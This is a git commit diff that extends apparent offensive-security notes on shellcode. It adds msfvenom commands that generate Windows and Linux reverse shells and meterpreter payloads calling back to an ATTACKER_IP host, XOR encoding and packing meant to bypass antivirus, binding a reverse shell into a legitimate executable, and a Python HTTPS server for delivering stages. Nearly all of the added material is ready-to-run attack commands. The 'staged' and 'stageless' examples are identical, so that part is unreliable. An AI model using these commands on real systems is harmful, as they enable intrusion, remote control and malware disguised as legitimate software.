shellcode
This commit is contained in:
parent
e9d2df0494
commit
76f57dd84f
|
|
@ -3,7 +3,12 @@
|
|||
* [linux syscalls](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) Are used to craft the shellcode in assembly language
|
||||
* [asmtutor.com](https://asmtutor.com) to check the assembly
|
||||
|
||||
## Writing Shellcode
|
||||
## Staged and Unstaged Payloads
|
||||
|
||||
* An unstaged payload is directly embedded in a binary and executes as is. This may be used to start malicious payload which does not need a remote connection or nearly none.
|
||||
* A small stub of the staged payload is embedded in the binary and should load additional instructions from remote which build the final reverse shell. The downloaded part will only reside in memory. The downloaded shellcode can be changed
|
||||
|
||||
## Writing Shellcode Manually
|
||||
|
||||
* Executing the shellcode relies on syscalls of the system
|
||||
|
||||
|
|
@ -53,7 +58,7 @@ MESSAGE:
|
|||
db "Hello, world!", 0dh, 0ah
|
||||
```
|
||||
|
||||
## Compilation
|
||||
### Compilation
|
||||
|
||||
* Compile and link 32 bit
|
||||
```sh
|
||||
|
|
@ -67,7 +72,7 @@ nasm -f elf64 helloworld.asm
|
|||
ld helloworld.o -o helloworld
|
||||
```
|
||||
|
||||
## Dump the binary
|
||||
### Dump the binary
|
||||
|
||||
* Dump the binary with `objdump -d helloworld` and take a look at the text section
|
||||
* Dump the text section into a file via
|
||||
|
|
@ -75,7 +80,7 @@ ld helloworld.o -o helloworld
|
|||
objcopy -j .text -O binary helloworld helloworld.text
|
||||
```
|
||||
|
||||
## Format the Shellcode
|
||||
### Format the Shellcode
|
||||
|
||||
* Format and test the code by dumping it into a c file
|
||||
```
|
||||
|
|
@ -88,3 +93,15 @@ echo -e "\n\t(*(void(*)())helloworld_text)();\n\treturn 0;\n}" >> helloworld.c
|
|||
```sh
|
||||
gcc -z execstack -g -o helloworld helloworld.c
|
||||
```
|
||||
|
||||
## Automated Shellcode Generation
|
||||
|
||||
* Automate the creation via msfvenom
|
||||
* Staged payloads look like this
|
||||
```sh
|
||||
msfvenom -p linux/x64/meterpreter/reverse_tcp
|
||||
```
|
||||
* Stageless payloads look like this
|
||||
```sh
|
||||
msfvenom -p linux/x64/meterpreter/reverse_tcp
|
||||
```
|
||||
|
|
|
|||
|
|
@ -14,7 +14,82 @@ Multiple sections inside the PE can be used to insert the shellcode. This is def
|
|||
|
||||
## Crafting Shellcode
|
||||
|
||||
* Use msfvenom to generate shellcode which executes the calculator
|
||||
```sh
|
||||
msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -f c -o stage.c
|
||||
```
|
||||
* Fill in the the missing parts to make it a valid c file
|
||||
```sh
|
||||
sed -i '1s/^/#include <windows.h>\n/' stage.c
|
||||
sed -i 's/=/= {/' stage.c
|
||||
sed -i 's/;/};/' stage.c
|
||||
echo -e "int main (void) {\n\tDWORD _protect;\n\tVirtualProtect(buf, sizeof(buf), PAGE_EXECUTE_READ, &_protect);\n\tint (*shellcode)() = (int(*)())(void *)buf;\n\tshellcode();\n\treturn 0;\n}" >> stage.c
|
||||
```
|
||||
|
||||
* Compile it
|
||||
```sh
|
||||
i686-w64-mingw32-gcc stage.c -o vcalc.exe
|
||||
```
|
||||
|
||||
### Compile C#
|
||||
|
||||
The Microsoft Visual C# compiler is called via
|
||||
```sh
|
||||
csc file.cs
|
||||
```
|
||||
|
||||
## Staged C2
|
||||
|
||||
* The stage on the target needs to download further parts of the shell into memory
|
||||
* These parts may be generated in one of the following ways (all of them will be found through AV)
|
||||
```sh
|
||||
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shell.bin -b '\x00\x0a\x0d'
|
||||
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shellcode.bin -b '\x00' -e x86/shikata_ga_nai -i 3 -f csharp
|
||||
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f exe --encrypt xor --encrypt-key "verysecretkey" -o xored-revshell.exe
|
||||
```
|
||||
* Generate certificate for the webserver
|
||||
```sh
|
||||
openssl req -new -x509 -keyout webserver.pem -out webserver.pem -days 365 -nodes
|
||||
```
|
||||
* Start the webserver
|
||||
```sh
|
||||
sudo python -c "import http.server, ssl;server_address=('0.0.0.0',443);httpd=http.server.HTTPServer(server_address,http.server.SimpleHTTPRequestHandler);httpd.socket=ssl.wrap_socket(httpd.socket,server_side=True,certfile='webserver.pem',ssl_version=ssl.PROTOCOL_TLSv1_2);httpd.serve_forever()"
|
||||
```
|
||||
|
||||
## Generate Custom Shellcode
|
||||
|
||||
* The target is to bypass the AV
|
||||
|
||||
### Xor and Encode
|
||||
|
||||
```sh
|
||||
msfvenom LHOST=$ATTACKER_IP LPORT=443 -p windows/x64/shell_reverse_tcp -f csharp
|
||||
```
|
||||
* Xor and encode the payload, decode the payload on target before it is executed
|
||||
|
||||
### Packer
|
||||
|
||||
* Compress and obfuscate shellcode inside a binary
|
||||
* Obviously, an unpacker is needed inside the binary in addition to the packed code
|
||||
* [mkaring's confuserx](https://github.com/mkaring/ConfuserEx)
|
||||
* Select the directory and binary
|
||||
* Go to settings, use packet and create Rules
|
||||
* Edit the rule as well
|
||||
* Go to Protect and click the button
|
||||
|
||||
### Binding
|
||||
|
||||
* Used to merge binaries
|
||||
* Shellcode will be merged into a legitimate PE and run as an additional thread
|
||||
```sh
|
||||
msfvenom -x legitimate.exe -k -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4711 -f exe -o notsolegitimate.exe
|
||||
```
|
||||
* Binded PEs need some disguising as well
|
||||
|
||||
## Tools & Tipps
|
||||
|
||||
* [hasherezade's PE-bear](https://github.com/hasherezade/pe-bear-releases.git) gives an overview of the PE's sections
|
||||
* [asmtutor.com](https://asmtutor.com)
|
||||
* [mvelazc0's staged payload](https://github.com/mvelazc0/defcon27_csharp_workshop/blob/master/Labs/lab2/2.cs)
|
||||
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue